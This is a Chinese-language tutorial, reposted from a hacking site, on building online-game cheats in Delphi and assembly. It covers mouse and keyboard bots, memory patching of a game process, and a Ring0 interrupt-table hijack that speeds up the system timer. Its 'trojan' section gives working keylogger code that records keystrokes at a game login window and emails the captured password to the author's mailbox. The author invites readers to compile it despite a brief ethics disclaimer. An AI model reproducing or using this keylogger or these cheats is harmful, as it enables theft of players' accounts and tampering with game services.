轉載自:
http://www.hackbase.com/tech/2009-09-22/56303.html
在幾年前我看到別人玩網絡遊戲用上了外掛,做爲程序員的我心裏實在是不爽,想搞清楚這到底是怎麼回事。就拿了一些來研究,小有心得,拿出來與大家共享,外掛無非就是分幾種罷了(依製作難度)。
1、動作式,所謂動作式,就是指用API發命令給窗口或API控制鼠標、鍵盤等,使遊戲裏的人物進行流動或者攻擊,最早以前的“石器”外掛就是這種方式。(這種外掛完全是垃圾,TMD,只要會一點點API的人都知道該怎麼做,不過這種外掛也是入門級的好東東,雖然不能提高你的戰鬥力,但是可以提高你的士氣)
2、本地修改式,這種外掛跟傳統上的一些遊戲修改器沒有兩樣,做這種外掛在編程上只需要對內存地址有一點認識並且掌握API就可以實現,“精靈”的外掛這是這種方式寫成的,它的難點在於找到那些地址碼,找地址一般地要藉助於別人的工具,有的遊戲還有雙碼校驗,找起來會比較困難。(這種外掛,比上一種有一點點難度,但是這種外掛做起來能夠用,也是有一定難度的啦~~,這種外掛可以很快提升你對內存地址的理解及應用,是你編程技術提高的好東東)
3、木馬式,這種外掛的目的是幫外掛製作者偷到用戶的密碼(TMD,“爛”就一個字,不過要知已知彼所以還是要談一下啦。),做這種外掛有一定的難度,需要HOOK或鍵盤監視技術做底子,纔可以完成,它的原理是首先截獲用戶的帳號或密碼,然後發到指定郵箱。(我以前寫過這樣的東東,但是從來沒有用過,我知道這種東東很不道德,所以以後千萬別用呀!)
4、加速式,這種外掛可以加快遊戲的速度……(對不起大家,這種東東我沒有實際做過,所以不能妄自評,慚愧)
這幾種外掛之中,前三種可以用VB,Delphi等語言比較好實現,後兩種則要用VC等底層支持比較好的編程工具纔好實現。
動作式外掛
首先,先來談一下動作式的外掛,這也是我第一次寫外掛時做的最簡單的一種。
記得還在“石器”時代的時候,我看到別人掛着一種軟件(外掛)人物就可以四外遊走(當時我還不知道外掛怎麼回事),於是找了這種軟件過來研究(拿來後才聽別人說這叫外掛),發現這種東東其實實現起來並不難,仔佃看其實人物的行走無非就是鼠標在不同的地方點來點去而已,看後就有實現這功能的衝動,隨後跑到MSDN上看了一些資料,發現實現這幾個功能,只需要幾個簡單的API函數就可以搞定:
1、 首先我們要知道現在鼠標的位置(爲了好還原現在鼠標的位置)我們要用到
API函數GetCursorPos,它的使用方法如下:
BOOL GetCursorPos(
LPPOINT lpPoint // address of structure for cursor position
);
2、我們把鼠標的位置移到要到人物走到的地方,我們就要用到SetCursorPos函數來移動鼠標位置,它的使用方法如下:
BOOL SetCursorPos(
int X, // horizontal position
int Y // vertical position
);
3.模擬鼠標發出按下和放開的動作,我們要用到mouse_event函數來實現,具休使用方法用下:
VOID mouse_event(
DWORD dwFlags, // flags specifying various motion/click variants
DWORD dx, // horizontal mouse position or position change
DWORD dy, // vertical mouse position or position change
DWORD dwData, // amount of wheel movement
DWORD dwExtraInfo // 32 bits of application-defined information
);
在它的dwFlags處,可用的事件很多如移動MOUSEEVENTF_MOVE,左鍵按下MOUSEEVENTF_LEFTDOWN,左鍵放開MOUSEEVENTF_LEFTUP,具體的東東還是查一下MSDN吧~~~~~
好了,有了前面的知識,我們就可以來看看人物移走是怎麼實現的了。
getcursorpos(point);
setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是個自制的隨機座標函數
mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
setcursorpos(point.x,point.y);
看了以上的代碼,是不是覺得人物的遊走很簡單啦~~,舉一反三,還有好多好東東可以用這個技巧實現(我早就說過,TMD,這是垃圾外掛的做法,相信了吧~~~),接下來,再看看遊戲裏面自動攻擊的做法吧(必需遊戲中攻擊支持快捷鍵的),道理還是一樣的,只是用的API不同罷了~~~,這回我們要用到的是keybd_event函數,其用法如下:
VOID keybd_event(
BYTE bVk, // virtual-key code
BYTE bScan, // hardware scan code
DWORD dwFlags, // flags specifying various function options
DWORD dwExtraInfo // additional data associated with keystroke
);
我們還要知道掃描碼不可以直接使用,要用函數MapVirtualKey把鍵值轉成掃描碼,MapVirtualKey的具體使用方法如下:
UINT MapVirtualKey(
UINT uCode, // virtual-key code or scan code
UINT uMapType // translation to perform
);
好了,比說此快接鍵是CTRL+A,接下來讓我們看看實際代碼是怎麼寫的:
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);
keybd_event(65,mapvirtualkey(65,0),0,0);
keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);
keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);
首先模擬按下了CTRL鍵,再模擬按下A鍵,再模擬放開A鍵,最後放開CTRL鍵,這就是一個模擬按快捷鍵的週期。
(看到這裏,差不多對簡易外掛有了一定的瞭解了吧~~~~做一個試試?如果你舉一反三還能有更好的東東出來,這就要看你的領悟能力了,不過不要高興太早這只是纔開始,以後還有更復雜的東東等着你呢)
本地修改式外掛
現在我們來看看,比動作式外掛更進一步的外掛——本地修改式外掛的整個製作過程進行一個詳細的分解。
具我所知,本地修改式外掛最典型的應用就是在“精靈”遊戲上面,因爲公司裏有很多同事玩“精靈”,於是我看了一下游戲的數據處理方式,發現它所發送到服務器上的信息是存在於內存當中(我看後第一個感受是:修改這種遊戲和修改單機版的遊戲沒有多大分別,換句話說就是在他向服務器提交信息之前修改了內存地址就可以了),當時我找到了地址於是修改了內存地址,果然,按我的想法修改了地址,讓系統自動提交後,果然成功了~~~~~OK,我們就來看看這類外掛是如何製作的。
在做外掛之前我們要對Windows的內存有個具體的認識,而在這裏我們所指的內存是指系統的內存偏移量,也就是相對內存,而我們所要對其進行修改,那麼我們要對幾個Windows API進行了解,OK,跟着例子讓我們看清楚這種外掛的製作和API的應用(爲了保證網絡遊戲的正常運行,我就不把找內存地址的方法詳細解說了)。
1.首先我們要用FindWindow,知道遊戲窗口的句柄,因爲我們要通過它來得知遊戲的運行後所在進程的ID,下面就是FindWindow的用法:
HWND FindWindow(
LPCTSTR lpClassName, // pointer to class name
LPCTSTR lpWindowName // pointer to window name
);
2.我們GetWindowThreadProcessId來得到遊戲窗口相對應進程的進程ID,函數用法如下:
DWORD GetWindowThreadProcessId(
HWND hWnd, // handle of window
LPDWORD lpdwProcessId // address of variable for process identifier
);
3.得到遊戲進程ID後,接下來的事是要以最高權限打開進程,所用到的函數OpenProcess的具體使用方法如下:
HANDLE OpenProcess(
DWORD dwDesiredAccess, // access flag
BOOL bInheritHandle, // handle inheritance flag
DWORD dwProcessId // process identifier
);
在dwDesiredAccess之處就是設存取方式的地方,它可設的權限很多,我們在這裏使用只要使用PROCESS_ALL_ACCESS 來打開進程就可以,其他的方式我們可以查一下MSDN。
4.打開進程後,我們就可以用函數對存內進行操作,在這裏我們只要用到WriteProcessMemory來對內存地址寫入數據即可(其他的操作方式比如說:ReadProcessMemory等,我在這裏就不一一介紹了),我們看一下WriteProcessMemory的用法:
BOOL WriteProcessMemory(
HANDLE hProcess, // handle to process whose memory is written to
LPVOID lpBaseAddress, // address to start writing to
LPVOID lpBuffer, // pointer to buffer to write data to
DWORD nSize, // number of bytes to write
LPDWORD lpNumberOfBytesWritten // actual number of bytes written
);
5.下面用CloseHandle關閉進程句柄就完成了。
這就是這類遊戲外掛的程序實現部份的方法,好了,有了此方法,我們就有了理性的認識,我們看看實際例子,提升一下我們的感性認識吧,下面就是XX遊戲的外掛代碼,我們照上面的方法對應去研究一下吧。
const
ResourceOffset: dword = $004219F4;
resource: dword = 3113226621;
ResourceOffset1: dword = $004219F8;
resource1: dword = 1940000000;
ResourceOffset2: dword = $0043FA50;
resource2: dword = 1280185;
ResourceOffset3: dword = $0043FA54;
resource3: dword = 3163064576;
ResourceOffset4: dword = $0043FA58;
resource4: dword = 2298478592;
var
hw: HWND;
pid: dword;
h: THandle;
tt: Cardinal;
begin
hw := FindWindow('XX', nil);
if hw = 0 then
Exit;
GetWindowThreadProcessId(hw, @pid);
h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if h = 0 then
Exit;
if flatcheckbox1.Checked=true then
begin
WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);
WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), t
t);
end;
if flatcheckbox2.Checked=true then
begin
WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), t
t);
WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), t
t);
WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), t
t);
end;
MessageBeep(0);
CloseHandle(h);
close;
這個遊戲是用了多地址對所要提交的數據進行了校驗,所以說這類遊戲外掛製作並不是很難,最難的是要找到這些地址。
木馬式外掛
木馬式外掛,可能大多像木馬吧,是幫助做外掛的人偷取別人遊戲的帳號及密碼的東東。因爲網絡上有此類外掛的存在,所以今天不得不說一下(我個人是非常討厭這類外掛的,請看過本文的朋友不要到處亂用此技術,謝謝合作)。要做此類外掛的程序實現方法很多(比如HOOK,鍵盤監視等技術),因爲HOOK技術對程序員的技術要求比較高並且在實際應用上需要多帶一個動態鏈接庫,所以在文中我會以鍵盤監視技術來實現此類木馬的製作。鍵盤監視技術只需要一個.exe文件就能實現做到後臺鍵盤監視,這個程序用這種技術來實現比較適合。
在做程序之前我們必需要了解一下程序的思路:
1、我們首先知道你想記錄遊戲的登錄窗口名稱。
2、判斷登錄窗口是否出現。
3、如果登錄窗口出現,就記錄鍵盤。
4、當窗口關閉時,把記錄信息,通過郵件發送到程序設計者的郵箱。
第一點我就不具體分析了,因爲你們比我還要了解你們玩的是什麼遊戲,登錄窗口名稱是什麼。從第二點開始,我們就開始這類外掛的程序實現之旅。那麼我們要怎麼樣判斷登錄窗口雖否出現呢?其實這個很簡單,我們用FindWindow函數就可以很輕鬆的實現了:
HWND FindWindow(
LPCTSTR lpClassName, // pointer to class name
LPCTSTR lpWindowName // pointer to window name
);
實際程序實現中,我們要找到'xx'窗口,就用FindWindow(nil,'xx')如果當返回值大於0時表示窗口已經出現,那麼我們就可以對鍵盤信息進行記錄了。
首先,我們用SetWindowsHookEx設置監視日誌,而該函數的用法如下:
HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle of application instance
DWORD dwThreadId // identity of thread to install hook for
);
在這裏要說明的是在我們程序當中我們要對HOOKPROC這裏我們要通過寫一個函數,來實現而HINSTANCE這裏我們直接用本程序的HINSTANCE就可以了,具體實現方法爲:
hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);
而HOOKPROC裏的函數就要複雜一點點。
function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdc
all;
begin
if findedtitle then file://如果發現窗口後
begin
if (peventmsg(lparam)^.message = WM_KEYDOWN) then file://消息等於鍵盤按下
hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lp
aram)^.paramH); file://通過keyhookresult(自定義的函數,主要功能是轉換截獲的消息
參數爲按鍵名稱。我會在文章尾附上轉化函數的)轉換消息。
if length(hookkey) > 0 then file://如果獲得按鍵名稱
begin
Write(hookkeyFile,hookkey); file://把按鍵名稱寫入文本文件
hookkey := '';
end;
end;
end;
以上就是記錄鍵盤的整個過程,簡單吧,如果記錄完可不要忘記釋放呀,UnHookWindowsHookEx(hHook),而hHOOK,就是創建setwindowshookex後所返回的句柄。我們已經得到了鍵盤的記錄,那麼現在最後只要把記錄的這些信息發送回來,我們就大功造成了。其實,發送這塊並不是很難,只要把記錄從文本文件裏邊讀出來,用DELPHI自帶的電子郵件組件發一下就萬事OK了。代碼如下:
assignfile(ReadFile,'hook.txt'); file://打開hook.txt這個文本文件
reset(ReadFile); file://設爲讀取方式
try
While not Eof(ReadFile) do file://當沒有讀到文件尾
begin
Readln(ReadFile,s,j); file://讀取文件行
body:=body+s;
end;
finally
closefile(ReadFile); file://關閉文件
end;
nmsmtp1.EncodeType:=uuMime; file://設置編碼
nmsmtp1.PostMessage.Attachments.Text:=''; file://設置附件
nmsmtp1.PostMessage.FromAddress:='[email protected]'; file://設置源郵件地址
nmsmtp1.PostMessage.ToAddress.Text:='[email protected]'; /設置目標郵件地址
nmsmtp1.PostMessage.Body.Text:='密碼'+' '+body; file://設置郵件內容
nmsmtp1.PostMessage.Subject:='password'; file://設置郵件標題
nmsmtp1.SendMail; file://發送郵件
這個程序全部功能已經實現,編編試試。
加速型外掛
原本我一直以爲加速外掛是針對某個遊戲而寫的,後來發現我這種概念是不對的,所謂加速外掛其實是修改時鐘頻率達到加速的目的。
以前DOS時代玩過編程的人就會馬上想到,這很簡單嘛不就是直接修改一下8253寄存器嘛,這在以前DOS時代可能可以行得通,但是windows則不然。windows是一個32位的操作系統,並不是你想改哪就改哪的(微軟的東東就是如此霸氣,說不給你改就不給你改),但要改也不是不可能,我們可以通過兩種方法來實現:第一是寫一個硬件驅動來完成,第二是用Ring0來實現(這種方法是CIH的作者陳盈豪首用的,它的原理是修改一下IDE表->創建一箇中斷門->進入Ring0->調用中斷修改向量,但是沒有辦法只能用ASM彙編來實現這一切*_*,做爲高級語言使用者慘啦!),用第一種方法用點麻煩,所以我們在這裏就用第二種方法實現吧~~~
在實現之前我們來理一下思路吧。
1、我們首先要寫一個過程在這個過程裏嵌入彙編語言來實現修改IDE表、創建中斷門,修改向量等工作
2、調用這個過程來實現加速功能。
好了,現在思路有了,我們就邊看代碼邊講解吧。
首先,我們建立一個過程,這個過程就是本程序的核心部份。
procedure SetRing(value:word); stdcall;
const ZDH = $03; //設一箇中斷號
var
IDT : array [0..5] of byte; //保存IDT表
OG : dword; //存放舊向量
begin
asm
push ebx
sidt IDT //讀入中斷描述符表
mov ebx, dword ptr [IDT+2] //IDT表基地址
add ebx, 8*ZDH //計算中斷在中斷描述符表中的位置
cli //關中斷
mov dx, word ptr [ebx+6]
shl edx, 16d
mov dx, word ptr [ebx]
mov [OG], edx
mov eax, offset @@Ring0 //指向Ring0級代碼段
mov word ptr [ebx], ax //低16位,保存在1,2位
shr eax, 16d
mov word ptr [ebx+6], ax //高16位,保存在6,7位
int ZDH //中斷
mov ebx, dword ptr [IDT+2] //重新定位
add ebx, 8*ZDH
mov edx, [OG]
mov word ptr [ebx], dx
shr edx, 16d
mov word ptr [ebx+6], dx //恢復被改了的向量
pop ebx
jmp @@exitasm //到exitasm處
@@Ring0: //Ring0,這個也是最最最核心的東東
mov al,$34 //寫入8253控制寄存器
out $43,al
mov ax,value //寫入定時值
out $40,al //寫定時值低位
mov al,ah
out $40,al //寫定時值高位
iretd //返回
@@exitasm:
end;
end;
最核心的東西已經寫完了,大部份朋友是知其然不知其所以然吧,呵呵,不過不知其所以然也然。下面我們就試着用一下這個過程來做一個類似於“變速齒輪”的一個東東吧!
先加一個窗口,在窗口上放上一個trackbar控件把其Max設爲20,Min設爲1,把Position設爲10,在這個控件的Change事件裏寫上:
SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));
因爲windows默認的值爲$1742,所以我們把1742做爲基數,又因爲值越小越快,反之越慢的原理,所以寫了這樣一個公式,好了,這就是“變速齒輪”的一個Delphi+ASM版了(只適用於win9X),呵呵,試一下吧,這對你幫助會很大的,呵呵。
在win2000裏,我們不可能實現在直接對端口進行操作,Ring0也失了效,有的人就會想到,我們可以寫驅動程序來完成呀,但在這裏我告訴你,windows2000的驅動不是一個VxD就能實現的,像我這樣的低手是寫不出windows所用的驅動WDM的,沒辦法,我只有藉助外力實現了,ProtTalk就是一個很好的設備驅動,他很方便的來實現對低層端口的操作,從而實現加速外掛。
1.我們首先要下一個PortTalk驅動,他的官方網站是http://www.beyondlogic.org
2.我們要把裏面的prottalk.sys拷貝出來。
3.建立一個Protalk.sys的接口(我想省略了,大家可以上http://www.freewebs.com/liuyue/porttalk.pas下個pas文件自己看吧)
4.實現加速外掛。
下面就講一下這程序的實現方法吧,如果說用ProtTalk來操作端口就容易多了,比win98下用ring權限操作方便。
1.新建一個工程,把剛剛下的接口文件和Protalk.sys一起拷到工程文件保存的文件夾下。
2.我們在我們新建的工程加入我們的接口文件
uses
windows,ProtTalk……
3.我們建立一個工程
procedure SetRing(value:word);
begin
if not OpenPortTalk then exit;
outportb($43,$34);
outportb($40,lo(Value));
outprotb($40,hi(value));
ClosePortTalk;
end;
4.先加一個窗口,在窗口上放上一個trackbar控件把其Max設爲20,Min設爲1,把Position設爲10,在這個控件的Change事件裏寫上:
SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));
就這麼容易。
好了,上面就是本人在學習研究外掛方面的一些小心得,拿出來和大家一塊分享。希望大家也能寫出自己的外掛來(切記,可不要用於非法目的哦!)